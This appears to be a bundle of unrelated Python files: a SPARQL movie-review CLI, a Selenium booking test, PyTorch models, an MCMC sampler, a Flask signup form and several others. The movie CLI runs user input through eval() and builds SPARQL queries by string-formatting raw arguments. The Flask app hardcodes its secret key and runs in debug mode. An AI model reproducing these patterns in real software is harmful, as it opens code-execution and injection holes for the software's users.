return (URIRef(self.uri + "#%s" % user_nick), RDF.type, FOAF["Person"]) in self.graph
class Store(DoConjunctiveGraph):
def __init__(self, pathfn, uri, title):
DoConjunctiveGraph.__init__(self, pathfn, uri, title)
# cuando inicializamos agrega el triple con predicado Titulo
self.graph.add((URIRef(self.uri), DC["title"], Literal(self.title)))
def cinema(self, data=None):
if data is not None:
# extraemos información de la entrada gracias a la expresion regular
name_cinema, web_cinema = (r_cinema.match(
data).group(1), r_cinema.match(data).group(2))
self.graph.add((URIRef(self.uri + "#cinema"), RDF.type, FOAF["Organization"]))
self.graph.add((URIRef(self.uri + "#cinema"), FOAF["name"], Literal(name_cinema)))
self.graph.add((URIRef(self.uri + "#cinema"), FOAF["weblog"], Literal(web_cinema)))
self.save()
else:
return self.graph.objects(URIRef(self.uri + "#cinema"), FOAF["name"])
def listmovies(self):
return self.graph.query(
""" SELECT DISTINCT ?p ?title
WHERE {
?p a imdb:Movie .
?p dc:title ?title .
}""")
def data_movie_by_uri(self, movie_uri):
return self.graph.query(
""" SELECT ?title ?year
WHERE {
%s%s%s dc:title ?title .
%s%s%s imdb:year ?year .
}""" % ("<", movie_uri, ">", "<", movie_uri, ">"))
def movie_uri_by_title(self, movie_title):
return self.graph.query(
""" SELECT DISTINCT ?p
WHERE {
?p dc:title "%s" .
}""" % movie_title)
def top_rated_movies(self, offset, limit, m):
C = self.graph.query(
""" SELECT (AVG(?rating) as ?R)
WHERE {
?url rev:hasReview ?review .
?review a rev:Review .
?review rev:rating ?rating .
}""")
C = float("%s" % list(C)[0])
# weighted rating (WR) = (v ÷ (v+m)) × R + (m ÷ (v+m)) × C
return self.graph.query(
""" SELECT (?title AS ?pelicula)
(COUNT(?review) AS ?v)
(AVG(?rating) AS ?R)
(
(
(COUNT(?review)/(COUNT(?review)+%d))*AVG(?rating) +
(%d /(COUNT(?review)+%d))*%.4f
)
AS ?IMDbRating
)
WHERE {
?url rev:hasReview ?review .
?url dc:title ?title .
?review a rev:Review .
?review rev:rating ?rating .
}
GROUP BY ?title
ORDER BY DESC(?IMDbRating)
LIMIT %s
OFFSET %s""" % (m, m, m, C, limit, offset))
def new_movie(self, movie):
movieuri = URIRef("https://www.imdb.com/title/tt%s/" % movie.movieID)
self.graph.add((movieuri, RDF.type, IMDB["Movie"]))
self.graph.add((movieuri, DC["title"], Literal(movie["title"])))
self.graph.add((movieuri, IMDB["year"], Literal(int(movie["year"]))))
for genres in movie["genres"]:
self.graph.add((movieuri, IMDB["genres"], Literal(genres)))
for director in movie["director"]:
self.graph.add((movieuri, IMDB["director"], Literal(director)))
for actor in (movie["cast"][0], movie["cast"][1]):
self.graph.add((movieuri, IMDB["cast"], Literal(actor)))
self.save()
def movie_is_in(self, uri):
return (URIRef(uri), RDF.type, IMDB["Movie"]) in self.graph
def new_review(self, user_uri, movie_id, date, rating, comment=None):
review = BNode() # @@ humanize the identifier (something like #rev-$date)
movieuri = URIRef("https://www.imdb.com/title/tt%s/" % movie_id)
self.graph.add(
(movieuri, REV["hasReview"], URIRef("%s#%s" % (self.uri, review))))
self.graph.add(
(URIRef("%s#%s" % (self.uri, review)), RDF.type, REV["Review"]))
self.graph.add((URIRef("%s#%s" % (self.uri, review)), DC["date"], Literal(date)))
self.graph.add((URIRef("%s#%s" % (self.uri, review)), REV["maxRating"], Literal(5)))
self.graph.add((URIRef("%s#%s" % (self.uri, review)), REV["minRating"], Literal(0)))
self.graph.add((URIRef("%s#%s" % (self.uri, review)), REV["reviewer"], user_uri))
self.graph.add((URIRef("%s#%s" % (self.uri, review)), REV["rating"], Literal(rating)))
if comment is not None:
self.graph.add((URIRef("%s#%s" % (self.uri, review)), REV["text"], Literal(comment)))
self.save()
def list_movies_user(self, user_uri):
return self.graph.query(
""" SELECT DISTINCT ?title
WHERE {
?p rev:reviewer %s%s%s .
?movie rev:hasReview ?p .
?movie dc:title ?title .
}""" % ("<", user_uri, ">"))
def movies_by_director(self, director_name):
return self.graph.query(
""" SELECT ?title ?year
WHERE {
?movie imdb:director "%s" .
?movie imdb:year ?year .
?movie dc:title ?title .
}""" % director_name)
def movies_by_actor(self, actor_name):
return self.graph.query(
""" SELECT ?title ?director ?year
WHERE {
?movie imdb:cast "%s" .
?movie dc:title ?title .
?movie imdb:director ?director .
?movie imdb:year ?year .
}""" % actor_name)
def movie_by_url(self, url):
return self.graph.query(
""" SELECT ?title ?year ?director ?cast
WHERE {
%s a imdb:Movie .
%s dc:title ?title .
%s imdb:year ?year .
%s imdb:director ?director .
%s imdb:cast ?cast .
}"""%(url,url,url,url,url))
def main(argv=None):
if not argv:
argv = sys.argv
u = UserFactory(userfn, useruri, title_user)
s = Store(storefn, storeuri, title_store)
if len(argv) > 1:
if argv[1] in ("help", "--help", "h", "-h"):
help()
elif argv[1] == "newuser":
nick_user = r_newuser.match(argv[2]).group(1)
if u.user_is_in(nick_user):
raise Exception(
"El nick %s ya se encuentra registrado" % nick_user)
else:
nick_registered = u.new_user(argv[2])
try:
user_name = eval(input("Nombre: "))
u.set_user_name(nick_registered, user_name)
except:
raise Exception(
"Error al registrar el nombre de %s" % nick_registered)
elif argv[1] == "setfriends":
u.set_friends(argv[2], argv[3])
elif argv[1] == "triplesusersn3":
print(u.len())
elif argv[1] == "triplesmoviesn3":
print(s.len())
elif argv[1] == "listofusers":
for user_name in u.list_users():
print("%s" % str(user_name[0]))
elif argv[1] == "userbynick":
for data_user in u.user_by_nick(argv[2]):
print(" Nick : %s\n Nombre : %s\n Email : %s" % data_user)
elif argv[1] == "listoffriends":
for data_friend in u.list_friends():
print("%s es amig@ de %s" % data_friend)
elif argv[1] == "myfriends":
for nick_friend in u.list_friends_of_nick(argv[2]):
print("%s" % nick_friend)
elif argv[1] == "cinema":
if os.path.exists(storefn):
print("Ya existe un cine registrado")
else:
s.cinema(argv[2])
elif argv[1] == "newmovie":
if argv[2].startswith("https://www.imdb.com/title/tt"):
if s.movie_is_in(argv[2]):
print("La película ya se encuentra registrada")
else:
i = imdb.IMDb()
movie = i.get_movie(
argv[2][len("https://www.imdb.com/title/tt"): -1])
print("Película : %s" % movie["title"].encode("utf-8"))
print("Año : %s" % movie["year"])
print("Género : ", end=" ")
for genre in movie["genres"]:
print("%s" % genre, end=" ")
print("")
for director in movie["director"]:
print("Dirigida por: %s" %
director["name"].encode("utf-8"))
print("Actores principales:")
for actor in (movie["cast"][0], movie["cast"][1]):
print("%s como %s" %
(actor["name"].encode("utf-8"), actor.currentRole))
# Registrar la cabecera de la pelicula (nombre, fecha de revision, tipo de objeto, director, genero y actores principales)
s.new_movie(movie)
else:
raise Exception(
"El formato de la película debe ser https://www.imdb.com/title/tt[id]/")
elif argv[1] == "review":
if not len(list(s.movie_uri_by_title(argv[3]))) == 0:
movie_uri = "%s" % list(s.movie_uri_by_title(argv[3]))[0]
if u.user_is_in(argv[2]) and s.movie_is_in(movie_uri):
user_uri = u.get_user_uri(argv[2])
movie_id = movie_uri[len(
"https://www.imdb.com/title/tt"): -1]
rating = None
print("Película : %s \t Año: %s" %
list(s.data_movie_by_uri(movie_uri))[0])
while not rating or (rating > 5 or rating <= 0):
try:
rating = int(eval(input("Valoración (max 5): ")))
except ValueError:
rating = None
date = None
while not date:
try:
i = eval(
input("Fecha de visualización (YYYY-MM-DD): "))
date = datetime.datetime(
*time.strptime(i, "%Y-%m-%d")[:6])
except:
date = None
comment = eval(input("Comentario: "))
s.new_review(user_uri, movie_id, date, rating, comment)
else:
print("Película no encontrada")
elif argv[1] == "listofmovies":
for movie in s.listmovies():
print("%s - %s" % movie)
elif argv[1] == "recommendtome":
""" Peliculas clasificadas por amigos """
"""for nick_friend in u.list_friends_of_nick(argv[2]):
print("Amig@ : %s"%nick_friend)
friend_uri = u.get_user_uri(nick_friend)
for movie_user in s.list_movies_user(friend_uri):
print(" %s"%movie_user)"""
for nick_friend in u.list_friends_of_nick(argv[2]):
for movie_user in s.list_movies_user(u.get_user_uri(nick_friend)):
print(" %s" % movie_user)
elif argv[1] == "topratedmovies":
table = np.array(
[["Película", "Número de reviews", "Valoración promedio(0-5)", "IMDb Rating"]])
m = 2 # minimo de reviews requeridas para ingresar en la lista top de recomendados
for movie in s.top_rated_movies(argv[2], argv[3], m):
if(int(movie[1]) >= m):
table = np.append(table, [movie], axis=0)
print(tabulate(np.delete(table, 0, axis=0),
table[0], tablefmt="fancy_grid", numalign="right", floatfmt=".1f"))
elif argv[1] == "moviebydirector":
for movie in s.movies_by_director(argv[2]):
print("%s - %s" % movie)
elif argv[1] == "moviebyactor":
for movie in s.movies_by_actor(argv[2]):
print("Título: %s\nDirector: %s\nAño:%s" % movie)
elif argv[1] == "moviebyurl":
print(s.movie_by_url(argv[2]))
elif argv[1] == "usermovies":
for movie in s.list_movies_user(u.get_user_uri(argv[2])):
print("%s" % movie)
else:
print("Bandera no reconocida")
else:
print("Sin acciones")
if __name__ == "__main__":
if not imdb:
raise Exception('This example requires the IMDB library! Install with "pip install imdbpy"')
main()
"""
REMARK 1 :
from rdflib import Graph
g = Graph()
g.parse('dicom.owl')
q =
[poner 3 comillas] SELECT ?c WHERE { ?c rdf:type owl:Class .
FILTER (!isBlank(?c)) } [poner 3 comillas]
qres = g.query(q)
"""
"""
REMARK 2 :
weighted rating (WR) = (v ÷ (v+m)) × R + (m ÷ (v+m)) × C
Where:
R = average for the movie (mean) = (Rating)
v = number of votes for the movie = (votes)
m = minimum votes required to be listed in the Top 250 (currently 25,000)
C = the mean vote across the whole report
"""
"""
REMARK 3 :
References :
RDF 1.1 Turtle : https://www.w3.org/TR/turtle/
FOAF specification : http://xmlns.com/foaf/spec/
rdflib.graph.Graph : https://rdflib.readthedocs.io/en/stable/apidocs/rdflib.html#rdflib.graph.Graph
IMDB roles : https://imdbpy.readthedocs.io/en/latest/usage/role.html
SPARQL Query Language for RDF : https://www.w3.org/TR/rdf-sparql-query/#modDistinct
Querying with SPARQL : https://rdflib.readthedocs.io/en/stable/intro_to_sparql.html
Working with SPARQL : https://rdfextras.readthedocs.io/en/latest/working_with.html
""" |
from Lib.common.ConfigLoader import ConfigLoader
from Lib.common.DriverData import DriverData
from Lib.common.Log import Log
from Lib.temasekproperties.HomePage import HomePage
from Lib.temasekproperties.Listings import Listings
from Lib.temasekproperties.LogIn import LogIn
from Lib.temasekproperties.Resources import Resources
cl = ConfigLoader()
createDriver = DriverData()
driver = createDriver.get_driver()
driver.get("https://temasekproperties.com/wp-login.php")
log = Log(driver)
li = LogIn(driver)
li.log_in("TestBS", "test123")
hp = HomePage(driver)
hp.go_to_resources_booking()
#hp.go_to_listings()
rb = Resources(driver)
#l.search_for("Derbyshire")
rb.book("Central - Newton", "Derbyshire #22-01")
bookedFor = rb.booking_steps()
hp.go_to_resources_booked()
rb.check_if_exist("6 Derbyshire #22-01",bookedFor)
|
import math
import torch
import torch.nn as nn
import torch.nn.init as init
import torch.utils.model_zoo as model_zoo
import pdb
__all__ = ['C3D', 'c3d_v1']
class C3D(nn.Module):
def __init__(self,
sample_size,
sample_duration,
num_classes=400):
super(C3D, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(3, 64, kernel_size=3, padding=1),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(1, 2, 2)))
self.group2 = nn.Sequential(
nn.Conv3d(64, 128, kernel_size=3, padding=1),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)))
self.group3 = nn.Sequential(
nn.Conv3d(128, 256, kernel_size=3, padding=1),
nn.ReLU(),
nn.Conv3d(256, 256, kernel_size=3, padding=1),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)))
self.group4 = nn.Sequential(
nn.Conv3d(256, 512, kernel_size=3, padding=1),
nn.ReLU(),
nn.Conv3d(512, 512, kernel_size=3, padding=1),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)))
self.group5 = nn.Sequential(
nn.Conv3d(512, 512, kernel_size=3, padding=1),
nn.ReLU(),
nn.Conv3d(512, 512, kernel_size=3, padding=1),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)))
last_duration = int(math.floor(sample_duration / 16))
last_size = int(math.floor(sample_size / 32))
self.fc1 = nn.Sequential(
nn.Linear((512 * last_duration * last_size * last_size) , 2048), #
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(2048, 2048),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(2048, num_classes))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
out = self.group4(out)
out = self.group5(out)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
def get_fine_tuning_parameters(model, ft_begin_index):
if ft_begin_index == 0:
return model.parameters()
ft_module_names = []
for i in range(ft_begin_index, 5):
ft_module_names.append('layer{}'.format(i))
ft_module_names.append('fc')
parameters = []
for k, v in model.named_parameters():
for ft_module in ft_module_names:
if ft_module in k:
parameters.append({'params': v})
break
else:
parameters.append({'params': v, 'lr': 0.0})
return parameters
def c3d_v1(**kwargs):
model = C3D(**kwargs)
return model
"""
References
----------
[1] Tran, Du, et al. "Learning spatiotemporal features with 3d convolutional networks."
Proceedings of the IEEE international conference on computer vision. 2015.
""" |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import numpy as np
import scipy as sp
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
from multiprocessing import Pool
y = np.array([4, 3, 4, 5, 5, 2, 3, 1, 4, 0, 1, 5, 5, 6, 5, 4, 4, 5, 3, 4])
N_comb_y = sp.misc.comb(8, y)
def likelihood(q):
return np.prod(N_comb_y * (q ** y) * ((1-q) ** (8-y)))
def update(old_param, old_value, step):
candidate = old_param + step * np.random.choice([-1, 1])
new_value = likelihood(candidate)
if new_value > old_value:
new_param = candidate
else:
prob = new_value / old_value
new_param = np.random.choice([candidate, old_param], p=[prob, 1.0-prob])
return new_param, new_value
def iter_func(idx):
np.random.seed(idx)
step = 0.001
init_param = step * np.random.randint(1, 1/step)
max_iter = 10**6
history = []
param = init_param
value = likelihood(init_param)
history.append(param)
for i in range(1, max_iter):
param, value = update(param, value, step)
history.append(param)
print("Iteration {} finished ... ".format(idx))
return history[10**4:10**6]
def main():
with Pool(24) as mp:
history = mp.map(iter_func, range(24))
samples = np.array(history).flatten()
# plt.hist(samples, bins=50)
sns.distplot(samples, norm_hist=True)
plt.savefig("hoge.pdf")
if __name__ == "__main__": main()
means = []
for i in range(10):
start = time.perf_counter()
main()
end = time.perf_counter()
print(f"elapsed time: {end-start} [s]")
means.append(end-start)
print(f"mean: {np.mean(means)} [s]")
|
import datetime
from django.db import models
class IssueManager(models.Manager):
"""An Issue manager to define custom calculation methods for object
istances
"""
def get_solved_issue_durations(self):
"""A manager method that returns time durations for all solved issues
"""
durations = []
solved_issues = self.model.objects.filter(solved=True)
for i in solved_issues:
durations.append(i.solved_on - i.created_on)
return durations
def humanize_timedelta(self, td):
"""returns human readable representation of timedelta value
"""
hours, remainder = divmod(td.seconds, 3600)
minutes, seconds = divmod(remainder, 60)
return {
'hours': hours,
'minutes': minutes,
'seconds': seconds,
}
def get_average_solving_time(self):
# XXX: We could realy easily solve this with Django's Avg aggregations,
# (see this code block that's commented out) but because sqlite3 is
# saving datetime/time fields in databse as text, we need some custom
# math
# avg = self.model.objects.filter(solved=True).aggregate(
# average_difference=models.Avg(
# models.F('solved_on') - models.F('created_on')
# )
# )
solved_issue_timedeltas = self.get_solved_issue_durations()
# There can be no issues which are solved:
if not solved_issue_timedeltas:
return self.humanize_timedelta(datetime.timedelta(0))
average_timedelta = sum(
# giving datetime.timedelta(0) as the start value makes sum work
# on timedeltas:
solved_issue_timedeltas, datetime.timedelta(0)
) / len(solved_issue_timedeltas)
return self.humanize_timedelta(average_timedelta)
def get_longest_solving_time(self):
solved_issue_timedeltas = self.get_solved_issue_durations()
# There can be no issues which are solved:
if not solved_issue_timedeltas:
return self.humanize_timedelta(datetime.timedelta(0))
return self.humanize_timedelta(max(solved_issue_timedeltas))
def get_shortest_solving_time(self):
solved_issue_timedeltas = self.get_solved_issue_durations()
# There can be no issues which are solved:
if not solved_issue_timedeltas:
return self.humanize_timedelta(datetime.timedelta(0))
return self.humanize_timedelta(min(solved_issue_timedeltas))
|
# encoding: UTF-8
"""
展示如何执行策略回测。
"""
from __future__ import division
from vnpy.trader.app.ctaStrategy.ctaBacktesting import BacktestingEngine
from vnpy.trader.app.ctaStrategy.ctaBase import *
if __name__ == '__main__':
from strategyBollBand import BollBandsStrategy
# 创建回测引擎
engine = BacktestingEngine()
# 设置引擎的回测模式为K线
engine.setBacktestingMode(engine.BAR_MODE)
# 设置使用的历史数据库
engine.setDatabase(MINUTE_DB_NAME)
# 设置回测用的数据起始日期,initHours 默认值为 0
engine.setStartDate('20180731 06:00',initHours=1)
engine.setEndDate('20180801 08:00')
# 设置产品相关参数
engine.setCapital(1000000) # 设置起始资金,默认值是1,000,000
engine.setSlippage(0.2) # 股指1跳
engine.setRate(0.3/10000) # 万0.3
engine.setSize(300) # 股指合约大小
engine.setPriceTick(0.2) # 股指最小价格变动
# 策略报告默认不输出,默认文件夹生成于当前文件夹下
engine.setLog(True,"D:\\log\\") # 设置是否输出日志和交割单, 默认值是不输出False
engine.setCachePath("D:\\vnpy_data\\") # 设置本地数据缓存的路径,默认存在用户文件夹内
# 在引擎中创建策略对象
d = {'symbolList':['tBTCUSD:bitfinex']}
engine.initStrategy(BollBandsStrategy, d)
# 开始跑回测
engine.runBacktesting()
# 显示回测结果
engine.showBacktestingResult()
engine.showDailyResult() |
#!/usr/bin/env python
# -*-coding:utf-8-*-
import pygame
from pygame.locals import *
import copy
import pgwidth
import pgrect
import pgrect_window
import time
class rect:
def __init__ (self,root,rt,ima_lo) :
""
self. root = root
self. rt = rt
self. act = []
self. ima_lo = ima_lo
def re_rect (self,n_rect=10,ima_ima=None ):
""
for y in range(1,22):
self.dessi_1(n_rect,y)
#0-38 39-
self.dessin_off =[4,5,6,7,12,13,14,15,16,17,38,37,36,35,39,40]
#for i in self.dessin_off:
# self.act[i].on =None
def dessi_1 (self,n_rect,y):
for i in range(1,n_rect):
""
self.act.append( pgrect.rect(self.root,self.rt))
self.act[-1]. size = [20,20]
self.act[-1]. pos = [0+i*33,800-y*33]
self.act[-1]. ima_load = self.ima_lo
self.act[-1]. font_text = None
self.act[-1]. name = str([i,y])
self.act[-1]. re_rect()
self.act[-1].ms_cl1 = self.close_block
self.rt.act.append(self.act[-1])
def close_block(self):
print self.rt.ms_app[-1].name
if __name__=='__main__':
""
print time.time()
a = pgwidth.width()
a.size = (1600,800)
a.ima_papier=[250,250,250]
a.width()
bock0 = rect(a.root,a,"block.jpg")
bock0.re_rect()
print time.time()
a.mainloop()
print time.time()
|
import json
import os
import falcon
class StudentReportJSON:
def __init__(self):
self._json_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../..', 'media',
'student_report.json')
def on_get(self, req, resp):
with open(self._json_path) as f:
resp.body = f.read()
resp.status = falcon.HTTP_200
resp.content_type = falcon.MEDIA_HTML
def on_post(self, req, resp):
resp.status = falcon.HTTP_405
resp.content_type = falcon.MEDIA_HTML
|
import torch
import torch.nn as nn
import physics_aware_training.digital_twin_utils
class SplitInputParameterNet(nn.Module):
def __init__(self,
input_dim,
nparams,
output_dim,
parameterNunits = [100,100,100],
internalNunits = [10,10,10]):
'''
Defines network that splits inputs x into physical system input and parameters.
Inputs are propagated through a "main" neural network whose weights are predicted by an
auxiliary neural network whose inputs are the parameters.
Args:
inputDim (int): dimension of physical system inputs
outputDim (int): dimension of physical system outputs
parameterDim (int): dimension of all physical system parameters combined
parameterNunits (list of int): defines the number of hidden units per layer in the
auxiliary parameter network.
internalDim (int): number of hidden units per layer of the main neural network that
propagates physical system inputs
inputNlayers (int): number of hidden layers of main neural network
'''
super(SplitInputParameterNet, self).__init__()
self.input_dim = input_dim
self.nparams = nparams
self.output_dim = output_dim
self.internalNunits = internalNunits
self.inputNlayers = len(internalNunits)
nparameters = 0
for i in range(len(internalNunits)-1):
nparameters += internalNunits[i]*internalNunits[i+1]
nparameters += internalNunits[i+1]
# parameterNet is a submodel that predicts a matrix of dimensions
self.parameterNet = torch.nn.Sequential()
self.parameterNet.add_module("fcIn", torch.nn.Linear(nparams, parameterNunits[0]))
for i in range(len(parameterNunits)):
if i<len(parameterNunits)-1:
self.parameterNet.add_module(f"relu{i}", torch.nn.ReLU())
self.parameterNet.add_module(f"fc{i}", torch.nn.Linear(parameterNunits[i], parameterNunits[i+1]))
else:
self.parameterNet.add_module(f"relu{i}", torch.nn.ReLU())
self.parameterNet.add_module(f"fcOut", torch.nn.Linear(parameterNunits[i], nparameters))
# two fully connected input and output layers adjust the input and output dimenstion to
# the internal dimension
self.fcIn = nn.Linear(input_dim, internalNunits[0])
self.fcOut = nn.Linear(internalNunits[-1], output_dim)
def forward(self, x):
batch_size, _ = x.shape
# initialize matrices for inputNet
inputNetMatrices = []
inputNetBiases = []
for i in range(len(self.internalNunits)-1):
inputNetMatrices.append([torch.zeros(batch_size, self.internalNunits[i], self.internalNunits[i+1])])
inputNetBiases.append([torch.zeros(batch_size, self.internalNunits[i+1], 1)])
# split x into physical system inputs and parameters
inputs = x[:, :self.input_dim]
parameters = x[:, self.input_dim:]
# AUXILIARY PARAMETER NETWORK
parameters = self.parameterNet(parameters)
# fill inputNetMatrices with outputs from parameterNet
index = 0
for i in range(len(self.internalNunits)-1):
index_temp = index
index += self.internalNunits[i] * self.internalNunits[i+1]
inputNetMatrices[i] = parameters[:, index_temp:index].reshape(batch_size, self.internalNunits[i+1], self.internalNunits[i])
# fill inputNetBiases with outputs from parameterNet
for i in range(len(self.internalNunits)-1):
index_temp = index
index += self.internalNunits[i+1]
inputNetBiases[i] = parameters[:, index_temp:index].reshape(batch_size, self.internalNunits[i+1], 1)
# MAIN INPUT NETWORK
inputs = self.fcIn(inputs).unsqueeze(-1)
# MAIN INPUT NETWORK
for i in range(len(self.internalNunits)-1):
# apply matrices and biases just filled with outputs from parameterNet
inputs = torch.bmm(inputNetMatrices[i], inputs)
inputs += inputNetBiases[i]
inputs = torch.relu(inputs)
return self.fcOut(inputs.squeeze(-1))
class SplitInputParameterObjective(object):
# define class to smuggle additional arguments into objective function
def __init__(self, train_loader, test_loader, dt_path, input_dim, nparams, output_dim, **modelargs):
self.modelargs = modelargs
self.dt_path = dt_path
self.train_loader = train_loader
self.test_loader = test_loader
self.input_dim = input_dim
self.nparams = nparams
self.output_dim = output_dim
def __call__(self, trial):
lr = trial.suggest_loguniform("lr", 1e-4, 1e-1)
parameterNlayers = trial.suggest_categorical("parameterNlayers", [1, 2, 3, 4, 5])
parameterNunits = []
if parameterNlayers == 1:
parameterNunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
if parameterNlayers == 2:
parameterNunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
if parameterNlayers == 3:
parameterNunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits3", 50, 1000)))
if parameterNlayers == 4:
parameterNunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits3", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits4", 50, 1000)))
if parameterNlayers == 5:
parameterNunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits3", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits4", 50, 1000)))
parameterNunits.append(int(trial.suggest_loguniform("Nunits5", 50, 1000)))
internalNlayers = trial.suggest_categorical("internalNlayers", [1, 2, 3, 4, 5])
internalNunits = []
if parameterNlayers == 1:
internalNunits.append(int(trial.suggest_loguniform("iNunits1", 10, 100)))
if parameterNlayers == 2:
internalNunits.append(int(trial.suggest_loguniform("iNunits1", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits2", 10, 100)))
if parameterNlayers == 3:
internalNunits.append(int(trial.suggest_loguniform("iNunits1", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits2", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits3", 10, 100)))
if parameterNlayers == 4:
internalNunits.append(int(trial.suggest_loguniform("iNunits1", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits2", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits3", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits4", 10, 100)))
if parameterNlayers == 5:
internalNunits.append(int(trial.suggest_loguniform("iNunits1", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits2", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits3", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits4", 10, 100)))
internalNunits.append(int(trial.suggest_loguniform("iNunits5", 10, 100)))
name = f"{self.dt_path}_v{trial.number}" #create name with trial index
value, model_path = physics_aware_training.digital_twin_utils.train_loop_reg_model(
self.train_loader,
self.test_loader,
name,
self.input_dim,
self.nparams,
self.output_dim,
Model = SplitInputParameterNet,
parameterNunits = parameterNunits,
internalNunits = internalNunits,
lr = lr,
**self.modelargs)
trial.set_user_attr('model_path', model_path) #save the model path string in NAS study
return value |
import FWCore.ParameterSet.Config as cms
process = cms.Process("Test")
process.source = cms.Source("EmptySource")
process.options.numberOfStreams = 2
process.a = cms.EDProducer("edmtest::one::WatchLumiBlocksProducer", transitions = cms.int32(0))
process.p = cms.Path(process.a)
|
from os import listdir
from os.path import isfile, join, abspath
image_path = abspath('./images')
onlyfiles = [f for f in listdir(image_path) if isfile(join(image_path, f))]
readme = '''# awesome-video-chat-backgrounds
Just in case you're at home on a video call and you haven't had time to tidy up your REAL background, here are some awesome backgrounds to help you get through your next video chat.
## Contributing
* Please submit pull requests to add additional photos/images to this collection!
* Images should be minimum of 1080 (width) x 550 (height) pixels
## Image List
'''
for file in onlyfiles:
title = file.split('.')[0].replace('_',' ').title()
readme += '<a href="./images/{}" title="{}"> <img align="center" src="./images/{}" width="540px"/></a>\n'.format(file, title, file)
with open('README.md','w+') as f:
f.write(readme)
|
from enum import Enum
class Sensortype(Enum):
Door = 0
Infrared = 1
Water = 2
Smoke = 3
Temperature = 4
class Recordtype(Enum):
Door = 0
Infrared = 1
Water = 2
Smoke = 3
Temperature = 4
class Onoff():
On = 1
Off = 0
class Status():
Success = 0
Fail = 1 |
from flask import Flask, render_template, request, redirect, session, flash
import re
EMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
app = Flask(__name__)
app.secret_key = '&@DHDJ^^(%^(^^^G@#$@#!@EDQADSG'
@app.route('/')
def index():
return render_template("index.html")
# check all inputs for length > 0 and password > 8 characters
def validLength(form):
if ((len(form['email'])) < 1 or
(len(form['fname'])) < 1 or
(len(form['lname'])) < 1 or
(len(form['pw'])) <= 8 or
(len(form['confirm_pw'])) < 1):
return False;
return True;
# no numbers in name fields
def validNameFields(form):
if not form['fname'].isalpha() or not form['lname'].isalpha():
return False
return True
# check for matching passwords
def matchingPasswordInputs(form):
if not form['pw'] == form['confirm_pw']:
return False
return True
@app.route('/process', methods=['POST'])
def process():
print(request.form)
if not validLength(request.form):
flash('All input fields required and Password must be more than 8 characters!')
return redirect('/')
elif not validNameFields(request.form):
flash('No numbers allowed in name inputs!')
return redirect('/')
elif not EMAIL_REGEX.match(request.form['email']):
flash('Invalid email address format!')
return redirect('/')
elif not matchingPasswordInputs(request.form):
flash('Passwords do not match!')
return redirect('/')
flash("Thanks for submitting your info!")
return redirect('/')
app.run(debug=True) |
"""
伙伴模块
"""
# -*- encoding=utf8 -*-
__author__ = "Lee.li"
from airtest.core.api import *
from multi_processframe.ProjectTools import common, common, common
def monster(start, devices):
"""
伙伴测试脚本
:param devices:
:return:
"""
poco = common.deviceconnect(devices)
check_menu("SysDMonster", poco) # 进入精灵
if poco("BookBg").exists(): # 判断伙伴界面是否存在
with poco.freeze() as freeze_poco:
if freeze_poco("item0").child("selected").exists() and \
freeze_poco("item1").child("selected").exists() and \
freeze_poco("item2").child("selected").exists() and \
freeze_poco("StarCount").exists() and \
freeze_poco("Stars").exists() and \
freeze_poco("BtnReward").exists() and \
freeze_poco("BtnAttrTotal").exists() and \
freeze_poco("WrapContent").exists() and \
freeze_poco("MonsterpreferenceDlg(Clone)").child("Help").exists() and \
freeze_poco("Icons").offspring("item0").exists() and \
freeze_poco("Icons").offspring("item1").exists() and \
freeze_poco("Select").exists() and \
freeze_poco("ActiveBtn").exists():
common.printgreen("伙伴界面UI元素显示正常")
else:
common.printred("伙伴界面UI元素显示异常,详情见截图")
common.get_screen_shot(start, time.time(), devices, "伙伴界面UI元素显示异常")
try:
freeze_poco("item1").child("selected").click()
freeze_poco("item2").child("selected").click()
freeze_poco("MonsterpreferenceDlg(Clone)").child("Help").click()
poco("Btn").click()
freeze_poco("BtnReward").click()
poco("PointRewardFrame").offspring("Close").click()
freeze_poco("BtnAttrTotal").click()
freeze_poco("BtnAttrTotal").click()
